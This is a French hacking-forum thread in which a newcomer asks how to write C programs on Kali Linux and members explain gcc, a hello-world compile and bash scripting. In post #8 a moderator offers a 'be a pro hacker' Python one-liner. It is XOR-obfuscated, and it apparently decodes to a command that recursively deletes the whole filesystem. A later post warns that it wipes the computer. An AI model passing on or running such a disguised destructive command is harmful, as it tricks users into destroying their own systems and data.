Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-05-2013 16:20:16

ANONYMOUS38
Membre Actif

programmer en c sous kali linux

Bonjour, je suis programmeur en c et j'aimerais savoir si il est possible de programmer des scripts en c sous kali linux, car pour l'instant, je n'ai pas trouvé le moyen.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-05-2013 23:34:30

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : programmer en c sous kali linux

Je ne peux pas te répondre dans les détails car je ne suis pas programmeur, ni en C. ni en quoi que ce soit.
Tu peux jetter un coup d'oeil à  gcc qui est un compilateur linux pour C et C++ en attendant une réponse précise.
Oui c'est possible et très facile pour des choses simples, il suffit d'invoquer gcc :
How to compile & execute C programs under Linux (Absolute basics)

#3 11-05-2013 01:15:22

M!C
Membre Actif

bas vi exemple :

nano /root/blabla.c

int main() {
blabla..........;
}

laisse une ligne vide à la fin du fichier pour éviter une erreur de compilation !

gcc /root/blabla.c -o /root/blabla

nano est configurable pour les coloration syntaxe

Dernière modification par M!C (11-05-2013 01:18:21)

#4 11-05-2013 08:30:52

ANONYMOUS38
Membre Actif

ah ok, mais vous, avec quelle langage programmer vous vos scripts si ce n'est pas en c,c++ , en javascript et python ? il est vrai que ces langage se retrouve à peu près sur toute les plateformes. je pense que je vais suivre la deuxième méthode car mon but et de programmer des scripts directement sous kali sans forcement avoir de logiciel de compilation inutile.

Dernière modification par ANONYMOUS38 (11-05-2013 08:38:56)

#5 11-05-2013 16:05:58

kcdtv
Membre d'honneur

Une part substantielle du kernel linux est écrit en C. smile

sans forcement avoir de logiciel de compilation inutile.

Si tu parles de gcc pas il est installé par défaut et parfaitement intégré à ton système d'exploitation et est fort pratique, tu l'utilises déjà sans le savoir. wink

avec quelle langage programmer vous vos scripts si ce n'est pas en c,c++ , en javascript et python ?

Tu as l'air de dire ça comme si programmer en python était non-naturel avec linux, Python c'est avant tout code libre - linux, il est installé par défaut dans 99% des distributions linux.
   Tu as pas mal de gens qui utilisent Perl par exemple,
   Avec linux tu as un interprète de commande par défaut beaucoup plus puissant et "funky" que le command prompt windows. Il s'agit de bash qui se base sur UNIX (ça marche aussi.... avec Macintosh! Si,si, un truc qui marche aussi avec Mac OS, on croit rêver! ).
   Tu retrouveras de vieux amis comme la boucle for, la boucle while, "print" c'est "echo" en bash...
  Differing Shell Features
  Pour lances un script il te suffit d'invoquer bash et le script.

Tu en verras pas mal dans le forum, pour automatiser des tâches répétitives dans le hack c'est super pratique, pour le maniement de fichiers de dictionnaires... 
  On a quelques artistes qui se baladent de ci de là dans le forum, n'hésite pas poser des questions smile

#6 11-05-2013 17:27:53

ANONYMOUS38
Membre Actif

Si je comprend bien c'est le langage bach que je doit apprendre, il est vrai que je n'était jamais sous linux avant backtrack et donc je ne développer que des logiciels en c++ sous Windows. Concernant les artiste qui se baladent sur le forum, oui j'ai remarquer, mais je ne reconnaissais pas le langage de leurs scripts, ce langage a beau avoir des similitude avec le langage c-c++, je n'y comprenait pas grand chose. j'ai trouver un tutoriel ici :
http://www.siteduzero.com/informatique/ … e-de-linux
concernant le langage bash, a mon avis je ne devrait pas mettre longtemps a maîtriser ce langage, car d'après ce que j'ai pu voir, il présente effectivement des similitudes avec le langage c. bon je vais essayer de bosser ça. A+

Dernière modification par ANONYMOUS38 (11-05-2013 17:34:56)

#7 11-05-2013 19:43:18

kcdtv
Membre d'honneur

Tu vas voir que l'aprentissage de bash se fait en parrellèle avec l¡apprentissage du maniment de linux.
A mon avis si tu sais programmer en C. bash va te paraitre fort simple, voire basique, c'est un peu dommage de te focaliser sur quelques lignes à rajouter pour compiler avec gcc  surtout si tu as déjà des connaissances, mais je crois que en apprenant bash et en te familiarisant un peu plus avec la ligne de commande, tu t'en rendras compte par toi même wink

#8 12-05-2013 00:30:12

spawn
Modérateur

Anonymous38 tu me rends triste.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#9 04-11-2015 23:39:38

Malassi
N00b

Faite attention au code Python de Spawn, si vous est sur Kali linux il sert a effacer tout les dossier et config de l'ordinateur.

Cordialement Malassi.

#10 05-11-2015 08:46:04

Seska
Membre V.I.P.

Bonjour,
Etant analyste programmeur je sais que maitriser un langage de programmation comme le C permet d'avoir de bonnes bases pour en apprendre un autre et le bash est un proche cousin. cool

#11 05-11-2015 18:25:18

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Tu peux programmer en c++ aussi...

Exemple:

#include <iostream>

using namespace std;

int main(){
	cout << "Hello World" << endl;
	return 0;	
}

Tu compiles ensuite.

g++ -o hello code.cpp

PS: on ne fais pas de script en c mais des exécutable depuis un fichier source.

1310812721.gif

#12 05-11-2015 21:38:45

kcdtv
Membre d'honneur

yo!
Avec C il faut compiler et installer,
Un script bash s'invoque directement, il suffit de connaitre la route.
Et répétons le : Bash n'est pas vraiment un langage de programmation, c'est avant tout un interprète d'ordres.

Annonce